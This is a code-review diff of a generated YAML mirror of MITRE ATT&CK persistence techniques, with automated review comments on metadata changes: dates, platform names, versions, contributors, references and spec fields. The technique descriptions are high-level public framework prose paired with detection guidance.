@@ -34615,23 +34978,50 @@ persistence:
Directory PowerShell modules, such as Set-ADUser
and Set-ADAccountControl
,
that change account configurations. \n\nMonitor Fine-Grained Password Policies
and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Command: Command Execution'
- 'User Account: User Account Metadata'
- 'Script: Script Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+ created: '2022-01-13T20:02:28.349Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/005
+ external_id: T1556.005
+ - source_name: dump_pwd_dcsync
+ description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+ All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+ url: https://adsecurity.org/?p=2053
+ - source_name: store_pwd_rev_enc
+ description: Microsoft. (2021, October 28). Store passwords using reversible
+ encryption. Retrieved January 3, 2022.
+ url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+ - source_name: how_pwd_rev_enc_1
+ description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+ encryption: how it works (part 1). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+ - source_name: how_pwd_rev_enc_2
+ description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+ encryption: how it works (part 2). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1546.016:
technique:
- modified: '2024-04-12T02:23:44.583Z'
+ modified: '2024-04-28T15:52:44.332Z'
name: Installer Packages
description: |-
Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)
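Review bot: the `- spec_version: '2.1'` removal near the bottom of this object is the first of many in this diff, and it strips the per-object STIX marker while `x_mitre_attack_spec_version` is raised from 2.1.0 to 3.2.0. STIX 2.1 carries `spec_version` on every SDO, so any consumer of this YAML that reads it per technique will now find it missing; confirm the generator intentionally stopped emitting it (for example because it now lives only on the bundle) rather than this being a side effect of a changed upstream export. Dropping `x_mitre_permissions_required` (`User`, `Administrator`) matches that field being deprecated upstream, and the added `x_mitre_domains`/`x_mitre_platforms` with the 1.0 to 1.1 bump look correct.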
@@ -34648,7 +35038,7 @@ persistence:
phase_name: persistence
x_mitre_contributors:
- Brandon Dalton @PartyD0lphin
- - Alexander Rodchenko
+ - Rodchenko Aleksandr
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
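Review bot: `- Rodchenko Aleksandr` reverses the name order used by the neighbouring entry (`Brandon Dalton @PartyD0lphin`, given name first) and changes the transliteration; contributor strings are attribution data, so confirm this mirrors the upstream ATT&CK record rather than a hand edit that the next regeneration would overwrite.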
@@ -34707,7 +35097,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.004:
technique:
@@ -34789,7 +35178,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.004
atomic_tests: []
T1543.002:
@@ -34904,12 +35292,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.002
atomic_tests: []
T1136:
technique:
- modified: '2024-01-31T20:46:43.215Z'
+ modified: '2024-10-15T15:53:21.895Z'
name: Create Account
description: |-
Adversaries may create an account to maintain access to victim systems.(Citation: Symantec WastedLocker June 2020) With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
@@ -34932,16 +35319,15 @@ persistence:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- IaaS
- Linux
- macOS
- - Google Workspace
- Network
- Containers
- SaaS
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
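Review bot: replacing `Azure AD`, `Office 365` and `Google Workspace` with `Office Suite` and `Identity Provider` changes the keys any per-platform index is built from, so the platform-specific index files must be regenerated in the same change and the indexer must accept the two new names (and tolerate the old ones disappearing); otherwise techniques like this one silently drop out of the old platform indexes. The 2.4 to 2.5 bump alongside it is the expected minor bump for a platform change.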
@@ -34968,7 +35354,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.013:
technique:
@@ -35037,7 +35422,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.007:
technique:
@@ -35073,7 +35457,7 @@ persistence:
Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named com.apple.loginwindow.[UUID].plist
within the ~/Library/Preferences/ByHost
directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.
Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the com.apple.loginwindow.[UUID].plist
file to execute payloads when a user logs in.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T23:46:56.443Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Autostart Execution: Re-opened Applications'
x_mitre_detection: Monitoring the specific plist files associated with reopening
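Review bot: `modified` goes backwards here, from 2022-05-11 to 2022-04-19, which cannot be a newer revision of the technique; a timestamp regression (it recurs for several other objects in this diff) indicates the generator is now reading a different upstream export, so please record in the commit message which ATT&CK release or STIX source this was regenerated from so the dates can be checked against it.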
@@ -35092,12 +35476,11 @@ persistence:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.007
atomic_tests: []
T1574.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.241Z'
name: 'Hijack Execution Flow: DLL Side-Loading'
description: |-
Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -35147,12 +35530,11 @@ persistence:
url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.002
atomic_tests: []
T1098.002:
technique:
- modified: '2024-01-03T15:46:06.706Z'
+ modified: '2024-10-15T15:37:25.303Z'
name: 'Account Manipulation: Additional Email Delegate Permissions'
description: "Adversaries may grant additional permission levels to maintain
persistent access to an adversary-controlled email account. \n\nFor example,
@@ -35185,9 +35567,10 @@ persistence:
x_mitre_contributors:
- Microsoft Detection and Response Team (DART)
- Mike Burns, Mandiant
- - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
- Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
- Arad Inbar, Fidelis Security
+ - Nilesh Dherange (Gurucul)
+ - Naveen Vijayaraghavan
x_mitre_deprecated: false
x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
permissions changes that may indicate excessively broad permissions being
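Review bot: splitting `Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)` into two entries leaves `(Gurucul)` on Dherange only, so Vijayaraghavan loses the affiliation the combined entry gave both; if upstream intends that it is fine, otherwise the second entry should read `Naveen Vijayaraghavan (Gurucul)` as well.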
@@ -35204,9 +35587,8 @@ persistence:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Office 365
- - Google Workspace
- x_mitre_version: '2.1'
+ - Office Suite
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Group: Group Modification'
- 'Application Log: Application Log Content'
@@ -35252,12 +35634,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.002
atomic_tests: []
T1653:
technique:
- modified: '2023-09-30T21:28:45.038Z'
+ modified: '2024-10-16T20:11:40.334Z'
name: Power Settings
description: |-
Adversaries may impair a system's ability to hibernate, reboot, or shut down in order to extend access to infected machines. When a computer enters a dormant state, some or all software and hardware may cease to operate which can disrupt malicious activity.(Citation: Sleep, shut down, hibernate)
@@ -35271,7 +35652,7 @@ persistence:
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_contributors:
- - Goldstein Menachem
+ - Menachem Goldstein
- Juan Tapiador
x_mitre_deprecated: false
x_mitre_detection: "Command-line invocation of tools capable of modifying services
@@ -35330,7 +35711,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.001:
technique:
@@ -35356,7 +35736,7 @@ persistence:
url: http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/
description: Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part
18. Retrieved November 15, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T23:45:03.153Z'
name: 'Boot or Logon Initialization Scripts: Logon Script (Windows)'
description: "Adversaries may use Windows logon scripts automatically executed
at logon initialization to establish persistence. Windows allows logon scripts
@@ -35382,13 +35762,11 @@ persistence:
- 'Command: Command Execution'
- 'Process: Process Creation'
- 'Windows Registry: Windows Registry Key Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1037.001
atomic_tests: []
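Review bot: after this hunk T1037.001 carries neither `spec_version` nor any `x_mitre_attack_spec_version`, because `- spec_version: '2.1'` and `- x_mitre_attack_spec_version: 2.1.0` are both deleted without a replacement, whereas other objects in this diff are moved to `x_mitre_attack_spec_version: 3.2.0`; the same happens to T1556.004 and T1574.012 further down. Check that consumers treat a missing attack-spec version as acceptable, or backfill the field for these objects.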
T1137.002:
technique:
- modified: '2024-04-16T12:41:55.175Z'
+ modified: '2024-10-15T16:01:48.325Z'
name: 'Office Application Startup: Office Test'
description: |-
Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy)
@@ -35412,8 +35790,8 @@ persistence:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Office 365
- x_mitre_version: '1.2'
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'Command: Command Execution'
@@ -35443,7 +35821,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1137.002
atomic_tests: []
T1547.008:
@@ -35486,7 +35863,7 @@ persistence:
Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem)
Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:34:43.405Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Autostart Execution: LSASS Driver'
x_mitre_detection: "With LSA Protection enabled, monitor the event logs (Events
@@ -35511,12 +35888,11 @@ persistence:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.008
atomic_tests: []
T1078.004:
technique:
- modified: '2024-03-29T15:42:13.499Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Cloud Accounts'
description: "Valid accounts in cloud environments may allow adversaries to
perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -35556,8 +35932,10 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
or malicious behavior, such as accessing information outside of the normal
@@ -35565,13 +35943,13 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.7'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.8'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
@@ -35602,17 +35980,14 @@ persistence:
url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.004
atomic_tests: []
T1053.002:
technique:
- modified: '2023-11-15T14:38:10.876Z'
+ modified: '2024-10-12T15:53:12.333Z'
name: 'Scheduled Task/Job: At'
description: |-
- Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+ Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the at.allow
file. If the at.allow
file does not exist, the at.deny
file is checked. Every username not listed in at.deny
is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the at.deny
exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
@@ -35675,7 +36050,7 @@ persistence:
- Windows
- Linux
- macOS
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Scheduled Job: Scheduled Job Creation'
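Review bot: the description of this technique now states that a job can be created through the `Win32_ScheduledJob` WMI class without invoking `at`, but the data sources kept here are still only `Command: Command Execution` and `Scheduled Job: Scheduled Job Creation`; a job created via WMI leaves no `at` command line, so the command-execution source does not cover the path the new sentence describes. If the sentence stays, the detection guidance should mention WMI activity as well, so the data sources match the text.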
@@ -35709,8 +36084,8 @@ persistence:
url: https://man7.org/linux/man-pages/man1/at.1p.html
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Microsoft Scheduled Task Events Win10
description: Microsoft. (2017, May 28). Audit Other Object Access Events.
Retrieved June 27, 2019.
@@ -35719,6 +36094,10 @@ persistence:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Malicious Life by Cybereason
+ description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+ the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+ url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
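Review bot: the URL added for `Malicious Life by Cybereason` carries a `#blog-subscribe` fragment, which lands on the subscription widget rather than the article; the reference should be `https://www.cybereason.com/blog/wmi-lateral-movement-win32` with the fragment stripped. The description also uses `Philip Tsukerman. (n.d.)` where neighbouring entries use the `Surname, Initial.` form (`Russinovich, M.`). Both come from upstream, so report them to ATT&CK rather than hand-editing the generated file.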
@@ -35731,12 +36110,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.002
atomic_tests: []
T1556:
technique:
- modified: '2024-04-11T21:51:44.851Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Modify Authentication Process
description: |-
Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -35749,6 +36127,7 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Chris Ross @xorrior
x_mitre_deprecated: false
@@ -35785,17 +36164,17 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Linux
- macOS
- Network
- - Azure AD
- - Google Workspace
- IaaS
- - Office 365
- SaaS
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Process: Process Access'
@@ -35841,9 +36220,65 @@ persistence:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ atomic_tests: []
+ T1546.017:
+ technique:
+ modified: '2024-11-11T19:05:38.708Z'
+ name: Udev Rules
+ description: |-
+ Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename.(Citation: Ignacio Udev research 2024)(Citation: Elastic Linux Persistence 2024)
+
+ Adversaries may abuse the udev subsystem by adding or modifying rules in udev rule files to execute malicious content. For example, an adversary may configure a rule to execute their binary each time the pseudo-device file, such as `/dev/random`, is accessed by an application. Although udev is limited to running short tasks and is restricted by systemd-udevd's sandbox (blocking network and filesystem access), attackers may use scripting commands under the action key `RUN+=` to detach and run the malicious content’s process in the background to bypass these controls.(Citation: Reichert aon sedexp 2024)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Eduardo González Hernández (@codexlynx)
+ - Eder Pérez Ignacio, @ch4ik0
+ - Wirapong Petshagun
+ - "@grahamhelton3"
+ - Ruben Groenewoud, Elastic
+ x_mitre_deprecated: false
+ x_mitre_detection: 'Monitor file creation and modification of Udev rule files
+ in `/etc/udev/rules.d/`, `/lib/udev/rules.d/`, and /usr/lib/udev/rules.d/,
+ specifically the `RUN` action key commands.(Citation: Ignacio Udev research
+ 2024) '
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'File: File Modification'
+ type: attack-pattern
+ id: attack-pattern--f4c3f644-ab33-433d-8648-75cc03a95792
+ created: '2024-09-26T17:02:09.888Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1546/017
+ external_id: T1546.017
+ - source_name: Ignacio Udev research 2024
+ description: Eder P. Ignacio. (2024, February 21). Leveraging Linux udev for
+ persistence. Retrieved September 26, 2024.
+ url: https://ch4ik0.github.io/en/posts/leveraging-Linux-udev-for-persistence/
+ - source_name: Elastic Linux Persistence 2024
+ description: Ruben Groenewoud. (2024, August 29). Linux Detection Engineering
+ - A Sequel on Persistence Mechanisms. Retrieved October 16, 2024.
+ url: https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms
+ - source_name: Reichert aon sedexp 2024
+ description: 'Zachary Reichert. (2024, August 19). Unveiling "sedexp": A Stealthy
+ Linux Malware Exploiting udev Rules. Retrieved September 26, 2024.'
+ url: https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.007:
technique:
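Review bot: the `x_mitre_detection` text of the new T1546.017 object is inconsistent with its own description: it names three rule directories (`/etc/udev/rules.d/`, `/lib/udev/rules.d/` and `/usr/lib/udev/rules.d/`, the last without the backticks the other two have) while the description lists five, omitting `/run/udev/rules.d/` and `/usr/local/lib/udev/rules.d/`, and the string ends with a stray space before the closing quote (`2024) '`). `/run/udev/rules.d/` sits on tmpfs and does not survive a reboot, which is precisely why a file monitor should not skip it. Both points are upstream text, so flag them there; the `atomic_tests: []` placeholder is correct for a technique with no tests yet, and listing both persistence and privilege-escalation in the kill chain matches the description.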
@@ -35880,7 +36315,7 @@ persistence:
Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\SOFTWARE\Microsoft\Netsh
.
Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T17:09:17.363Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Event Triggered Execution: Netsh Helper DLL'
x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes
@@ -35904,51 +36339,11 @@ persistence:
- SYSTEM
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.007
atomic_tests: []
T1505.001:
technique:
- x_mitre_platforms:
- - Windows
- - Linux
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Carlos Borges, @huntingneo, CIP
- - Lucas da Silva Pereira, @vulcanunsec, CIP
- - Kaspersky
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a
- type: attack-pattern
- created: '2019-12-12T14:59:58.168Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1505.001
- url: https://attack.mitre.org/techniques/T1505/001
- - source_name: NetSPI Startup Stored Procedures
- url: https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/
- description: 'Sutherland, S. (2016, March 7). Maintaining Persistence via
- SQL Server – Part 1: Startup Stored Procedures. Retrieved July 8, 2019.'
- - source_name: Kaspersky MSSQL Aug 2019
- url: https://securelist.com/malicious-tasks-in-ms-sql-server/92167/
- description: 'Plakhov, A., Sitchikhin, D. (2019, August 22). Agent 1433: remote
- attack on Microsoft SQL Server. Retrieved September 4, 2019.'
- - source_name: Microsoft xp_cmdshell 2017
- url: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017
- description: Microsoft. (2017, March 15). xp_cmdshell (Transact-SQL). Retrieved
- September 9, 2019.
- - source_name: Microsoft CLR Integration 2017
- url: https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017
- description: Microsoft. (2017, June 19). Common Language Runtime Integration.
- Retrieved July 8, 2019.
- - source_name: NetSPI SQL Server CLR
- url: https://blog.netspi.com/attacking-sql-server-clr-assemblies/
- description: Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies.
- Retrieved July 8, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-10-15T16:05:24.007Z'
name: SQL Stored Procedures
description: "Adversaries may abuse SQL stored procedures to establish persistent
access to systems. SQL Stored Procedures are code that can be saved and reused
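Review bot: the block removed here (`x_mitre_platforms`, contributors, `id`/`type`/`created`, `external_references`) is not dropped, it reappears below in a different key order, so this hunk is pure reordering and the substantive edits (the `modified` date and the refreshed NetSPI URLs) are buried in the next hunk; emitting keys in a fixed order from the generator would keep diffs like this reviewable. The same move pattern shows for T1078.004 above, where `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` are added early in the object and removed at its end.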
@@ -35971,20 +36366,57 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Carlos Borges, @huntingneo, CIP
+ - Lucas da Silva Pereira, @vulcanunsec, CIP
+ - Kaspersky
